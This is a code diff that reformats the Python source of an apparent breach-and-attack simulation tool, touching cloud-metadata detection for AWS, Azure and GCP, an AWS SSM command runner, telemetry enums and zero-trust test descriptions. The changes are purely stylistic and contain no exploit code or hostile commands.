+@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
 def test_get_instance_id_bad_region_request(bad_region_request_mock_instance):
     assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID


-@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
 def test_get_region_bad_region_request(bad_region_request_mock_instance):
     assert bad_region_request_mock_instance.get_region() is None


-@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
 def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
     assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
@@ -225,35 +239,37 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
 # 'account_id' bad requests
 @pytest.fixture
 def bad_account_id_request_mock_instance(account_id_exception):
-    return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
-                                       'region': AVAILABILITY_ZONE_RESPONSE,
-                                       'account_id': None},
-                                 exception={'instance_id': None,
-                                            'region': None,
-                                            'account_id': account_id_exception})
+    return get_test_aws_instance(
+        text={
+            "instance_id": INSTANCE_ID_RESPONSE,
+            "region": AVAILABILITY_ZONE_RESPONSE,
+            "account_id": None,
+        },
+        exception={"instance_id": None, "region": None, "account_id": account_id_exception},
+    )


-@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
 def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance):
     assert bad_account_id_request_mock_instance.is_instance()


-@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
 def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance):
     assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS


-@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
 def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance):
     assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID


-@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
 def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance):
     assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION


-@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
+@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
 def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance):
     assert bad_account_id_request_mock_instance.get_account_id() is None
@@ -263,15 +279,15 @@ def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_insta
 def not_found_request_mock_instance():
     with requests_mock.Mocker() as m:
         # request made to get instance_id
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
         m.get(url, status_code=404)

         # request made to get region
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
         m.get(url)

         # request made to get account_id
-        url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
+        url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
         m.get(url)

         not_found_aws_instance_object = AwsInstance()
@@ -3,7 +3,7 @@ from unittest import TestCase

 from .aws_service import filter_instance_data_from_aws_response

-__author__ = 'shay.nehmad'
+__author__ = "shay.nehmad"


 class TestFilterInstanceDataFromAwsResponse(TestCase):
@@ -49,10 +49,10 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
     }
     """

-        self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
+        self.assertEqual(
+            filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
+        )
         self.assertEqual(
             filter_instance_data_from_aws_response(json.loads(json_response_full)),
-            [{'instance_id': 'string',
-              'ip_address': 'string',
-              'name': 'string',
-              'os': 'string'}])
+            [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
+        )
@@ -8,7 +8,9 @@ from common.cloud.instance import CloudInstance
 from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT

 LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
-AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
+AZURE_METADATA_SERVICE_URL = (
+    "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
+)

 logger = logging.getLogger(__name__)

@@ -18,6 +20,7 @@ class AzureInstance(CloudInstance):
     Access to useful information about the current machine if it's an Azure VM.
     Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
     """
+
     def is_instance(self):
         return self._on_azure

@@ -34,9 +37,11 @@ class AzureInstance(CloudInstance):
         self._on_azure = False

         try:
-            response = requests.get(AZURE_METADATA_SERVICE_URL,
-                                    headers={"Metadata": "true"},
-                                    timeout=SHORT_REQUEST_TIMEOUT)
+            response = requests.get(
+                AZURE_METADATA_SERVICE_URL,
+                headers={"Metadata": "true"},
+                timeout=SHORT_REQUEST_TIMEOUT,
+            )

             # If not on cloud, the metadata URL is non-routable and the connection will fail.
             # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
@@ -46,7 +51,9 @@ class AzureInstance(CloudInstance):
             else:
                 logger.warning(f"Metadata response not ok: {response.status_code}")
         except requests.RequestException:
-            logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
+            logger.debug(
+                "Failed to get response from Azure metadata service: This instance is not on Azure."
+            )

     def try_parse_response(self, response):
         try:
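The AZURE_METADATA_SERVICE_URL hunk above shows how black handles over-long expressions: it wraps them in parentheses for implicit line continuation rather than using backslashes. A small sketch of the same idiom (the names and URL below are illustrative only, not part of this diff):

API_VERSION = "2019-04-30"

# The parentheses let the expression span several lines; no backslash continuation
# is needed, and the whole parenthesized group is still a single expression.
METADATA_URL = (
    "http://169.254.169.254/metadata/instance?api-version=%s" % API_VERSION
)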
@@ -3,84 +3,104 @@ import requests
 import requests_mock
 import simplejson

-from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL,
-                                               AzureInstance)
+from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureInstance
 from common.cloud.environment_names import Environment


 GOOD_DATA = {
-    'compute': {'azEnvironment': 'AZUREPUBLICCLOUD',
-                'isHostCompatibilityLayerVm': 'true',
-                'licenseType': 'Windows_Client',
-                'location': 'westus',
-                'name': 'examplevmname',
-                'offer': 'Windows',
-                'osProfile': {'adminUsername': 'admin',
-                              'computerName': 'examplevmname',
-                              'disablePasswordAuthentication': 'true'},
-                'osType': 'linux',
-                'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a',
-                'plan': {'name': 'planName',
-                         'product': 'planProduct',
-                         'publisher': 'planPublisher'},
-                'platformFaultDomain': '36',
-                'platformUpdateDomain': '42',
-                'publicKeys': [{'keyData': 'ssh-rsa 0',
-                                'path': '/home/user/.ssh/authorized_keys0'},
-                               {'keyData': 'ssh-rsa 1',
-                                'path': '/home/user/.ssh/authorized_keys1'}],
-                'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group',
-                'resourceGroupName': 'macikgo-test-may-23',
-                'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/'
-                              'providers/Microsoft.Compute/virtualMachines/examplevmname',
-                'securityProfile': {'secureBootEnabled': 'true',
-                                    'virtualTpmEnabled': 'false'},
-                'sku': 'Windows-Server-2012-R2-Datacenter',
-                'storageProfile': {'dataDisks': [{'caching': 'None',
-                                                  'createOption': 'Empty',
-                                                  'diskSizeGB': '1024',
-                                                  'image': {'uri': ''},
-                                                  'lun': '0',
-                                                  'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
-                                                                        'resourceGroups/macikgo-test-may-23/providers/'
-                                                                        'Microsoft.Compute/disks/exampledatadiskname',
-                                                                  'storageAccountType': 'Standard_LRS'},
-                                                  'name': 'exampledatadiskname',
-                                                  'vhd': {'uri': ''},
-                                                  'writeAcceleratorEnabled': 'false'}],
-                                   'imageReference': {'id': '',
-                                                      'offer': 'UbuntuServer',
-                                                      'publisher': 'Canonical',
-                                                      'sku': '16.04.0-LTS',
-                                                      'version': 'latest'},
-                                   'osDisk': {'caching': 'ReadWrite',
-                                              'createOption': 'FromImage',
-                                              'diskSizeGB': '30',
-                                              'diffDiskSettings': {'option': 'Local'},
-                                              'encryptionSettings': {'enabled': 'false'},
-                                              'image': {'uri': ''},
-                                              'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
-                                                                    'resourceGroups/macikgo-test-may-23/providers/'
-                                                                    'Microsoft.Compute/disks/exampleosdiskname',
-                                                              'storageAccountType': 'Standard_LRS'},
-                                              'name': 'exampleosdiskname',
-                                              'osType': 'Linux',
-                                              'vhd': {'uri': ''},
-                                              'writeAcceleratorEnabled': 'false'}},
-                'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx',
-                'tags': 'baz:bash;foo:bar',
-                'version': '15.05.22',
-                'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6',
-                'vmScaleSetName': 'crpteste9vflji9',
-                'vmSize': 'Standard_A3',
-                'zone': ''},
-    'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132',
-                                                       'publicIpAddress': ''}],
-                                        'subnet': [{'address': '10.144.133.128',
-                                                    'prefix': '26'}]},
-                               'ipv6': {'ipAddress': []},
-                               'macAddress': '0011AAFFBB22'}]}
-}
+    "compute": {
+        "azEnvironment": "AZUREPUBLICCLOUD",
+        "isHostCompatibilityLayerVm": "true",
+        "licenseType": "Windows_Client",
+        "location": "westus",
+        "name": "examplevmname",
+        "offer": "Windows",
+        "osProfile": {
+            "adminUsername": "admin",
+            "computerName": "examplevmname",
+            "disablePasswordAuthentication": "true",
+        },
+        "osType": "linux",
+        "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
+        "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
+        "platformFaultDomain": "36",
+        "platformUpdateDomain": "42",
+        "publicKeys": [
+            {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
+            {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
+        ],
+        "publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
+        "resourceGroupName": "macikgo-test-may-23",
+        "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
+        "providers/Microsoft.Compute/virtualMachines/examplevmname",
+        "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
+        "sku": "Windows-Server-2012-R2-Datacenter",
+        "storageProfile": {
+            "dataDisks": [
+                {
+                    "caching": "None",
+                    "createOption": "Empty",
+                    "diskSizeGB": "1024",
+                    "image": {"uri": ""},
+                    "lun": "0",
+                    "managedDisk": {
+                        "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+                        "resourceGroups/macikgo-test-may-23/providers/"
+                        "Microsoft.Compute/disks/exampledatadiskname",
+                        "storageAccountType": "Standard_LRS",
+                    },
+                    "name": "exampledatadiskname",
+                    "vhd": {"uri": ""},
+                    "writeAcceleratorEnabled": "false",
+                }
+            ],
+            "imageReference": {
+                "id": "",
+                "offer": "UbuntuServer",
+                "publisher": "Canonical",
+                "sku": "16.04.0-LTS",
+                "version": "latest",
+            },
+            "osDisk": {
+                "caching": "ReadWrite",
+                "createOption": "FromImage",
+                "diskSizeGB": "30",
+                "diffDiskSettings": {"option": "Local"},
+                "encryptionSettings": {"enabled": "false"},
+                "image": {"uri": ""},
+                "managedDisk": {
+                    "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+                    "resourceGroups/macikgo-test-may-23/providers/"
+                    "Microsoft.Compute/disks/exampleosdiskname",
+                    "storageAccountType": "Standard_LRS",
+                },
+                "name": "exampleosdiskname",
+                "osType": "Linux",
+                "vhd": {"uri": ""},
+                "writeAcceleratorEnabled": "false",
+            },
+        },
+        "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
+        "tags": "baz:bash;foo:bar",
+        "version": "15.05.22",
+        "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
+        "vmScaleSetName": "crpteste9vflji9",
+        "vmSize": "Standard_A3",
+        "zone": "",
+    },
+    "network": {
+        "interface": [
+            {
+                "ipv4": {
+                    "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
+                    "subnet": [{"address": "10.144.133.128", "prefix": "26"}],
+                },
+                "ipv6": {"ipAddress": []},
+                "macAddress": "0011AAFFBB22",
+            }
+        ]
+    },
+}


 BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
@@ -89,7 +109,7 @@ http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<
 javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'

-BAD_DATA_JSON = {'': ''}
+BAD_DATA_JSON = {"": ""}


 def get_test_azure_instance(url, **kwargs):
@@ -114,9 +134,9 @@ def test_get_cloud_provider_name_good_data(good_data_mock_instance):


 def test_try_parse_response_good_data(good_data_mock_instance):
-    assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name']
-    assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId']
-    assert good_data_mock_instance.location == GOOD_DATA['compute']['location']
+    assert good_data_mock_instance.instance_name == GOOD_DATA["compute"]["name"]
+    assert good_data_mock_instance.instance_id == GOOD_DATA["compute"]["vmId"]
+    assert good_data_mock_instance.location == GOOD_DATA["compute"]["location"]


 # good request, bad data (json)
@@ -16,6 +16,7 @@ class GcpInstance(CloudInstance):
     """
    Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
     """
+
     def is_instance(self):
         return self._on_gcp

@@ -37,9 +38,17 @@ class GcpInstance(CloudInstance):
                 logger.warning("Got unexpected GCP Metadata format")
             else:
                 if not response.headers["Metadata-Flavor"] == "Google":
-                    logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"]))
+                    logger.warning(
+                        "Got unexpected Metadata flavor: {}".format(
+                            response.headers["Metadata-Flavor"]
+                        )
+                    )
                 else:
-                    logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
+                    logger.warning(
+                        "On GCP, but metadata response not ok: {}".format(response.status_code)
+                    )
         except requests.RequestException:
-            logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
+            logger.debug(
+                "Failed to get response from GCP metadata service: This instance is not on GCP"
+            )
             self._on_gcp = False
@@ -7,6 +7,7 @@ class CloudInstance(object):

     The current machine can be a cloud instance (for example EC2 instance or Azure VM).
     """
+
     def is_instance(self) -> bool:
         raise NotImplementedError()
@@ -2,8 +2,8 @@ from enum import Enum


 class CloudProviders(Enum):
-    AWS = 'aws'
-    AZURE = 'azure'
-    GCP = 'gcp'
-    ALIBABA = 'aliyun'
-    ORACLE = 'oci'
+    AWS = "aws"
+    AZURE = "azure"
+    GCP = "gcp"
+    ALIBABA = "aliyun"
+    ORACLE = "oci"
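Hunks like this one are pure string normalization: black v20.8b1 prefers double quotes and rewrites single-quoted literals unless the switch would force new escape characters. A quick illustration of the rule (the values below are hypothetical, not from this diff):

provider = 'aws'            # black rewrites this to: provider = "aws"
quip = 'she said "hello"'   # left alone: double quotes here would require escaping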
@@ -1,6 +1,6 @@
 from common.cmd.cmd_result import CmdResult

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"


 class AwsCmdResult(CmdResult):
@@ -10,8 +10,11 @@ class AwsCmdResult(CmdResult):

     def __init__(self, command_info):
         super(AwsCmdResult, self).__init__(
-            self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
-            command_info['StandardErrorContent'])
+            self.is_successful(command_info, True),
+            command_info["ResponseCode"],
+            command_info["StandardOutputContent"],
+            command_info["StandardErrorContent"],
+        )
         self.command_info = command_info

     @staticmethod
@@ -22,4 +25,6 @@ class AwsCmdResult(CmdResult):
         :param is_timeout: Whether the given command timed out
         :return: True if successful, False otherwise.
         """
-        return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))
+        return (command_info["Status"] == "Success") or (
+            is_timeout and (command_info["Status"] == "InProgress")
+        )
@@ -5,7 +5,7 @@ from common.cmd.aws.aws_cmd_result import AwsCmdResult
 from common.cmd.cmd_runner import CmdRunner
 from common.cmd.cmd_status import CmdStatus

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

 logger = logging.getLogger(__name__)

@@ -19,7 +19,7 @@ class AwsCmdRunner(CmdRunner):
         super(AwsCmdRunner, self).__init__(is_linux)
         self.instance_id = instance_id
         self.region = region
-        self.ssm = AwsService.get_client('ssm', region)
+        self.ssm = AwsService.get_client("ssm", region)

     def query_command(self, command_id):
         return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
@@ -28,15 +28,18 @@ class AwsCmdRunner(CmdRunner):
         return AwsCmdResult(command_info)

     def get_command_status(self, command_info):
-        if command_info['Status'] == 'InProgress':
+        if command_info["Status"] == "InProgress":
             return CmdStatus.IN_PROGRESS
-        elif command_info['Status'] == 'Success':
+        elif command_info["Status"] == "Success":
             return CmdStatus.SUCCESS
         else:
             return CmdStatus.FAILURE

     def run_command_async(self, command_line):
         doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
-        command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
-                                            InstanceIds=[self.instance_id])
-        return command_res['Command']['CommandId']
+        command_res = self.ssm.send_command(
+            DocumentName=doc_name,
+            Parameters={"commands": [command_line]},
+            InstanceIds=[self.instance_id],
+        )
+        return command_res["Command"]["CommandId"]
@@ -1,4 +1,4 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"


 class Cmd(object):

@@ -1,4 +1,4 @@
-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"


 class CmdResult(object):
@@ -6,7 +6,7 @@ from common.cmd.cmd import Cmd
 from common.cmd.cmd_result import CmdResult
 from common.cmd.cmd_status import CmdStatus

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"

 logger = logging.getLogger(__name__)

@@ -64,7 +64,7 @@ class CmdRunner(object):
         command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
         for command, result in command_result_pairs:
             instance = command_instance_dict[command]
-            instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
+            instance_results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, result)

         return instance_results

@@ -91,7 +91,9 @@ class CmdRunner(object):
         results = []

         while (curr_time - init_time < timeout) and (len(commands) != 0):
-            for command in list(commands):  # list(commands) clones the list. We do so because we remove items inside
+            for command in list(
+                commands
+            ):  # list(commands) clones the list. We do so because we remove items inside
                 CmdRunner._process_command(command, commands, results, True)

             time.sleep(CmdRunner.WAIT_SLEEP_TIME)
@@ -102,8 +104,11 @@ class CmdRunner(object):

         for command, result in results:
             if not result.is_success:
-                logger.error('The following command failed: `%s`. status code: %s',
-                             str(command[1]), str(result.status_code))
+                logger.error(
+                    "The following command failed: `%s`. status code: %s",
+                    str(command[1]),
+                    str(result.status_code),
+                )

         return results

@@ -148,11 +153,13 @@ class CmdRunner(object):
         c_id = command.cmd_id
         try:
             command_info = c_runner.query_command(c_id)
-            if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
+            if (not should_process_only_finished) or c_runner.get_command_status(
+                command_info
+            ) != CmdStatus.IN_PROGRESS:
                 commands.remove(command)
                 results.append((command, c_runner.get_command_result(command_info)))
         except Exception:
-            logger.exception('Exception while querying command: `%s`', str(c_id))
+            logger.exception("Exception while querying command: `%s`", str(c_id))
             if not should_process_only_finished:
                 commands.remove(command)
                 results.append((command, CmdResult(False)))
@@ -1,6 +1,6 @@
 from enum import Enum

-__author__ = 'itay.mizeretz'
+__author__ = "itay.mizeretz"


 class CmdStatus(Enum):

@@ -1 +1 @@
-T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'
+T1216_PBA_FILE_DOWNLOAD_PATH = "/api/t1216-pba/download"

@@ -1 +1 @@
-ES_SERVICE = 'elastic-search-9200'
+ES_SERVICE = "elastic-search-9200"
@@ -1,10 +1,10 @@
 class TelemCategoryEnum:
-    EXPLOIT = 'exploit'
-    POST_BREACH = 'post_breach'
-    SCAN = 'scan'
-    SCOUTSUITE = 'scoutsuite'
-    STATE = 'state'
-    SYSTEM_INFO = 'system_info'
-    TRACE = 'trace'
-    TUNNEL = 'tunnel'
-    ATTACK = 'attack'
+    EXPLOIT = "exploit"
+    POST_BREACH = "post_breach"
+    SCAN = "scan"
+    SCOUTSUITE = "scoutsuite"
+    STATE = "state"
+    SYSTEM_INFO = "system_info"
+    TRACE = "trace"
+    TUNNEL = "tunnel"
+    ATTACK = "attack"
@@ -13,7 +13,15 @@ DEVICES = "Devices"
 NETWORKS = "Networks"
 PEOPLE = "People"
 DATA = "Data"
-PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
+PILLARS = (
+    DATA,
+    PEOPLE,
+    NETWORKS,
+    DEVICES,
+    WORKLOADS,
+    VISIBILITY_ANALYTICS,
+    AUTOMATION_ORCHESTRATION,
+)

 STATUS_UNEXECUTED = "Unexecuted"
 STATUS_PASSED = "Passed"
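The PILLARS hunk demonstrates black's "magic trailing comma": a collection that cannot fit on one line, or that already carries a trailing comma, is exploded to one element per line, and the trailing comma keeps it that way on later runs. A minimal illustration with hypothetical contents:

# Fits on one line and has no trailing comma: black keeps it collapsed.
compact = ("data", "people", "networks")

# Exploded form: the trailing comma after the last element tells black
# to preserve the one-element-per-line layout.
exploded = (
    "data",
    "people",
    "networks",
)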
@@ -57,7 +65,7 @@ TESTS = (
     TEST_SCOUTSUITE_SECURE_AUTHENTICATION,
     TEST_SCOUTSUITE_RESTRICTIVE_POLICIES,
     TEST_SCOUTSUITE_LOGGING,
-    TEST_SCOUTSUITE_SERVICE_SECURITY
+    TEST_SCOUTSUITE_SERVICE_SECURITY,
 )

 PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit"
@@ -78,10 +86,10 @@ PRINCIPLES = {
     PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
     PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
     PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
     "Access Control) only.",
     PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
     PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
-    PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources."
+    PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
 }

 POSSIBLE_STATUSES_KEY = "possible_statuses"
@@ -92,183 +100,183 @@ TEST_EXPLANATION_KEY = "explanation"
 TESTS_MAP = {
     TEST_SEGMENTATION: {
         TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
         "running on, that belong to different network segments.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
-            STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
+            STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
         },
         PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
         PILLARS_KEY: [NETWORKS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
     },
     TEST_MALICIOUS_ACTIVITY_TIMELINE: {
         TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
         "exploitation.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
         },
         PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
         PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
     },
     TEST_ENDPOINT_SECURITY_EXISTS: {
         TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
             "software on endpoints.",
             STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
-            "security concern. "
+            "security concern. ",
         },
         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
         PILLARS_KEY: [DEVICES],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_MACHINE_EXPLOITED: {
         TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
             "which endpoints were compromised.",
-            STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
+            STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
         },
         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
         PILLARS_KEY: [DEVICES],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
     },
     TEST_SCHEDULED_EXECUTION: {
         TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
             "software.",
-            STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
+            STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
         },
         PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
         PILLARS_KEY: [PEOPLE, NETWORKS],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
     },
     TEST_DATA_ENDPOINT_ELASTIC: {
         TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
             STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
-            "that indicate attempts to access them. "
+            "that indicate attempts to access them. ",
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
         PILLARS_KEY: [DATA],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_DATA_ENDPOINT_HTTP: {
         TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
             STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
-            "attempts to access them. "
+            "attempts to access them. ",
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
         PILLARS_KEY: [DATA],
-        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
+        POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
     },
     TEST_DATA_ENDPOINT_POSTGRESQL: {
         TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
